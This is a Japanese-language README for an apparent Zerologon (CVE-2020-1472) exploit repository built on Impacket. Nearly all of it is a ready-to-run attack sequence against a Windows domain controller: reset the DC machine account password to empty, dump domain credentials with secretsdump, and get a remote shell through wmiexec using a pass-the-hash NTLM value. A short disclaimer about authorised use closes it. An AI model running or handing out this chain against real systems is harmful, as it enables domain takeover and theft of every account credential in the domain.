
CVE-2020-1472 (Zerologon) の実用的な概念実証 (PoC)。Impacket ライブラリを使用して Netlogon の脆弱性を悪用し、ドメインコントローラへの不正アクセスを実行します。
このリポジトリには、CVE-2020-1472(Zerologon)を悪用するために Impacket ツールと組み合わせた Zerologon エクスプロイトの更新版実装(2024年)が含まれています。このエクスプロイトは Windows Server 環境を標的とし、マシンアカウントのパスワードを操作して横移動(ラテラルムーブメント)を行います。
pip install -r requirements.txt
python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python secretsdump.py -just-dc "tancongmang/[email protected]"
python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
WIN-C9PAHHGJN91 と 192.168.40.145 は、ターゲットの実際のホスト名と IP アドレスに置き換えてください。このツールは責任を持って使用してください。明示的な許可なくシステムを悪用するための不正使用は違法かつ非倫理的です。著者は、このツールによって引き起こされた誤用や損害について一切の責任を負いません。